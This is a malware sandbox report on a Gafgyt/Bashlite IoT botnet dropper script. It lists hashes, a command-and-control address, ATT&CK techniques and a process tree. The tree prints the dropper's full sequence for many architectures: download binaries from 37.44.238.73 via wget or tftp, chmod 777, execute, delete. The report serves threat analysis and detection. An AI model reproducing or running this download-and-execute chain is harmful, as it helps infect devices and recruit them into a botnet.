gafgyt | ba18aff2c29cbe926a950c505310cbcee46e1b2e5fd38b08e8be5000e90301a5

Analysis

max time kernel
149s
max time network
149s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240508-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240508-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
17-12-2024 07:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

update.sh
Size

3KB
MD5

2f17e8a3d3c383fa8eed2871c745febf
SHA1

73ee845d24d3ae45e47c3f230f96fe5e81ef30ff
SHA256

ba18aff2c29cbe926a950c505310cbcee46e1b2e5fd38b08e8be5000e90301a5
SHA512

22c3a116f062889ad1bef07e20c9fab2cf1fd1993a4435eae385a28d5bbaf02569b08c1fd98022427e14fa44208201913ef4382a9f1921f544512cb9a1f7ca08

Score

10^/10

gafgyt botnet defense_evasion discovery

Malware Config

Extracted

Family

gafgyt

37.44.238.73:8778

Signatures

Detected Gafgyt variant 1 IoCs

resource	yara_rule
behavioral1/files/fstream-1.dat	family_gafgyt

Gafgyt family
gafgyt
Gafgyt/Bashlite
IoT botnet with numerous variants first seen in 2014.
botnet gafgyt

File and Directory Permissions Modification 1 TTPs 11 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
1543	chmod
1555	chmod
1505	chmod
1525	chmod
1537	chmod
1549	chmod
1561	chmod
1567	chmod
1511	chmod
1519	chmod
1531	chmod

Executes dropped EXE 1 IoCs

ioc	pid	Process
/tmp/roze.mips	1506	roze.mips

System Network Configuration Discovery 1 TTPs 10 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
1499	wget
1504	busybox
1510	busybox
1508	wget
1509	busybox
1512	roze.mipsel
1513	rm
1503	busybox
1506	roze.mips
1507	rm

Writes file to tmp directory 35 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/roze.i686	busybox
File opened for modification	/tmp/roze.ppc	busybox
File opened for modification	/tmp/roze.m68k	busybox
File opened for modification	/tmp/roze.sparc	wget
File opened for modification	/tmp/roze.sparc	busybox
File opened for modification	/tmp/roze.mips	busybox
File opened for modification	/tmp/roze.armv7	busybox
File opened for modification	/tmp/roze.i686	busybox
File opened for modification	/tmp/roze.sparc	busybox
File opened for modification	/tmp/roze.mips	wget
File opened for modification	/tmp/roze.armv6	wget
File opened for modification	/tmp/roze.armv6	busybox
File opened for modification	/tmp/roze.armv4	wget
File opened for modification	/tmp/roze.mipsel	busybox
File opened for modification	/tmp/roze.sh4	wget
File opened for modification	/tmp/roze.armv6	busybox
File opened for modification	/tmp/roze.sh4	busybox
File opened for modification	/tmp/roze.x86	wget
File opened for modification	/tmp/roze.armv7	wget
File opened for modification	/tmp/roze.i586	wget
File opened for modification	/tmp/roze.m68k	wget
File opened for modification	/tmp/roze.m68k	busybox
File opened for modification	/tmp/roze.armv4	busybox
File opened for modification	/tmp/roze.x86	busybox
File opened for modification	/tmp/roze.i686	wget
File opened for modification	/tmp/roze.ppc	wget
File opened for modification	/tmp/roze.ppc	busybox
File opened for modification	/tmp/roze.mips	busybox
File opened for modification	/tmp/roze.sh4	busybox
File opened for modification	/tmp/roze.x86	busybox
File opened for modification	/tmp/roze.i586	busybox
File opened for modification	/tmp/roze.armv4	busybox
File opened for modification	/tmp/roze.mipsel	wget
File opened for modification	/tmp/roze.mipsel	busybox
File opened for modification	/tmp/roze.i586	busybox

/tmp/update.sh
/tmp/update.sh
1⤵
PID:1498
- /usr/bin/wget
  wget http://37.44.238.73/roze.mips -O roze.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1499
- /bin/busybox
  busybox wget http://37.44.238.73/roze.mips -O roze.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1503
- /bin/busybox
  busybox tftp -r roze.mips -g 37.44.238.73
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1504
- /bin/chmod
  chmod 777 roze.mips
  2⤵
  - File and Directory Permissions Modification
  PID:1505
- /tmp/roze.mips
  ./roze.mips
  2⤵
  - Executes dropped EXE
  - System Network Configuration Discovery
  PID:1506
- /bin/rm
  rm -rf roze.mips
  2⤵
  - System Network Configuration Discovery
  PID:1507
- /usr/bin/wget
  wget http://37.44.238.73/roze.mipsel -O roze.mipsel
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1508
- /bin/busybox
  busybox wget http://37.44.238.73/roze.mipsel -O roze.mipsel
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1509
- /bin/busybox
  busybox tftp -r roze.mipsel -g 37.44.238.73
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1510
- /bin/chmod
  chmod 777 roze.mipsel
  2⤵
  - File and Directory Permissions Modification
  PID:1511
- /tmp/roze.mipsel
  ./roze.mipsel
  2⤵
  - System Network Configuration Discovery
  PID:1512
- /bin/rm
  rm -rf roze.mipsel
  2⤵
  - System Network Configuration Discovery
  PID:1513
- /usr/bin/wget
  wget http://37.44.238.73/roze.sh4 -O roze.sh4
  2⤵
  - Writes file to tmp directory
  PID:1514
- /bin/busybox
  busybox wget http://37.44.238.73/roze.sh4 -O roze.sh4
  2⤵
  - Writes file to tmp directory
  PID:1515
- /bin/busybox
  busybox tftp -r roze.sh4 -g 37.44.238.73
  2⤵
  - Writes file to tmp directory
  PID:1516
- /bin/chmod
  chmod 777 roze.sh4
  2⤵
  - File and Directory Permissions Modification
  PID:1519
- /tmp/roze.sh4
  ./roze.sh4
  2⤵
  PID:1520
- /bin/rm
  rm -rf roze.sh4
  2⤵
  PID:1521
- /usr/bin/wget
  wget http://37.44.238.73/roze.x86 -O roze.x86
  2⤵
  - Writes file to tmp directory
  PID:1522
- /bin/busybox
  busybox wget http://37.44.238.73/roze.x86 -O roze.x86
  2⤵
  - Writes file to tmp directory
  PID:1523
- /bin/busybox
  busybox tftp -r roze.x86 -g 37.44.238.73
  2⤵
  - Writes file to tmp directory
  PID:1524
- /bin/chmod
  chmod 777 roze.x86
  2⤵
  - File and Directory Permissions Modification
  PID:1525
- /tmp/roze.x86
  ./roze.x86
  2⤵
  PID:1526
- /bin/rm
  rm -rf roze.x86
  2⤵
  PID:1527
- /usr/bin/wget
  wget http://37.44.238.73/roze.armv6 -O roze.armv6
  2⤵
  - Writes file to tmp directory
  PID:1528
- /bin/busybox
  busybox wget http://37.44.238.73/roze.armv6 -O roze.armv6
  2⤵
  - Writes file to tmp directory
  PID:1529
- /bin/busybox
  busybox tftp -r roze.armv6 -g 37.44.238.73
  2⤵
  - Writes file to tmp directory
  PID:1530
- /bin/chmod
  chmod 777 roze.armv6
  2⤵
  - File and Directory Permissions Modification
  PID:1531
- /tmp/roze.armv6
  ./roze.armv6
  2⤵
  PID:1532
- /bin/rm
  rm -rf roze.armv6
  2⤵
  PID:1533
- /usr/bin/wget
  wget http://37.44.238.73/roze.armv7 -O roze.armv7
  2⤵
  - Writes file to tmp directory
  PID:1534
- /bin/busybox
  busybox wget http://37.44.238.73/roze.armv7 -O roze.armv7
  2⤵
  PID:1535
- /bin/busybox
  busybox tftp -r roze.armv7 -g 37.44.238.73
  2⤵
  - Writes file to tmp directory
  PID:1536
- /bin/chmod
  chmod 777 roze.armv7
  2⤵
  - File and Directory Permissions Modification
  PID:1537
- /tmp/roze.armv7
  ./roze.armv7
  2⤵
  PID:1538
- /bin/rm
  rm -rf roze.armv7
  2⤵
  PID:1539
- /usr/bin/wget
  wget http://37.44.238.73/roze.i686 -O roze.i686
  2⤵
  - Writes file to tmp directory
  PID:1540
- /bin/busybox
  busybox wget http://37.44.238.73/roze.i686 -O roze.i686
  2⤵
  - Writes file to tmp directory
  PID:1541
- /bin/busybox
  busybox tftp -r roze.i686 -g 37.44.238.73
  2⤵
  - Writes file to tmp directory
  PID:1542
- /bin/chmod
  chmod 777 roze.i686
  2⤵
  - File and Directory Permissions Modification
  PID:1543
- /tmp/roze.i686
  ./roze.i686
  2⤵
  PID:1544
- /bin/rm
  rm -rf roze.i686
  2⤵
  PID:1545
- /usr/bin/wget
  wget http://37.44.238.73/roze.ppc -O roze.ppc
  2⤵
  - Writes file to tmp directory
  PID:1546
- /bin/busybox
  busybox wget http://37.44.238.73/roze.ppc -O roze.ppc
  2⤵
  - Writes file to tmp directory
  PID:1547
- /bin/busybox
  busybox tftp -r roze.ppc -g 37.44.238.73
  2⤵
  - Writes file to tmp directory
  PID:1548
- /bin/chmod
  chmod 777 roze.ppc
  2⤵
  - File and Directory Permissions Modification
  PID:1549
- /tmp/roze.ppc
  ./roze.ppc
  2⤵
  PID:1550
- /bin/rm
  rm -rf roze.ppc
  2⤵
  PID:1551
- /usr/bin/wget
  wget http://37.44.238.73/roze.i586 -O roze.i586
  2⤵
  - Writes file to tmp directory
  PID:1552
- /bin/busybox
  busybox wget http://37.44.238.73/roze.i586 -O roze.i586
  2⤵
  - Writes file to tmp directory
  PID:1553
- /bin/busybox
  busybox tftp -r roze.i586 -g 37.44.238.73
  2⤵
  - Writes file to tmp directory
  PID:1554
- /bin/chmod
  chmod 777 roze.i586
  2⤵
  - File and Directory Permissions Modification
  PID:1555
- /tmp/roze.i586
  ./roze.i586
  2⤵
  PID:1556
- /bin/rm
  rm -rf roze.i586
  2⤵
  PID:1557
- /usr/bin/wget
  wget http://37.44.238.73/roze.m68k -O roze.m68k
  2⤵
  - Writes file to tmp directory
  PID:1558
- /bin/busybox
  busybox wget http://37.44.238.73/roze.m68k -O roze.m68k
  2⤵
  - Writes file to tmp directory
  PID:1559
- /bin/busybox
  busybox tftp -r roze.m68k -g 37.44.238.73
  2⤵
  - Writes file to tmp directory
  PID:1560
- /bin/chmod
  chmod 777 roze.m68k
  2⤵
  - File and Directory Permissions Modification
  PID:1561
- /tmp/roze.m68k
  ./roze.m68k
  2⤵
  PID:1562
- /bin/rm
  rm -rf roze.m68k
  2⤵
  PID:1563
- /usr/bin/wget
  wget http://37.44.238.73/roze.sparc -O roze.sparc
  2⤵
  - Writes file to tmp directory
  PID:1564
- /bin/busybox
  busybox wget http://37.44.238.73/roze.sparc -O roze.sparc
  2⤵
  - Writes file to tmp directory
  PID:1565
- /bin/busybox
  busybox tftp -r roze.sparc -g 37.44.238.73
  2⤵
  - Writes file to tmp directory
  PID:1566
- /bin/chmod
  chmod 777 roze.sparc
  2⤵
  - File and Directory Permissions Modification
  PID:1567
- /tmp/roze.sparc
  ./roze.sparc
  2⤵
  PID:1568
- /bin/rm
  rm -rf roze.sparc
  2⤵
  PID:1569
- /usr/bin/wget
  wget http://37.44.238.73/roze.armv4 -O roze.armv4
  2⤵
  - Writes file to tmp directory
  PID:1570
- /bin/busybox
  busybox wget http://37.44.238.73/roze.armv4 -O roze.armv4
  2⤵
  - Writes file to tmp directory
  PID:1571
- /bin/busybox
  busybox tftp -r roze.armv4 -g 37.44.238.73
  2⤵
  - Writes file to tmp directory
  PID:1572

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/roze.mips

Filesize
209KB

MD5
419aade96c12dfea0260ba505fb31b5b

SHA1
564e5f24382c87b24e0d2fb6e2705ecc6f29fd60

SHA256
f1bd061af699e21be35d9dd3d873f93e5eea01085fb9cc90684d5657936ecf75

SHA512
a1467a609d96c4845e7a18fc7c7da629c6eb8c98ea42c510bf822034e4f16b9a2e3c4fc731ef5e581b35194a3417dceffcbde5b56baf23b0f290f69ed981cbe6

Download Submit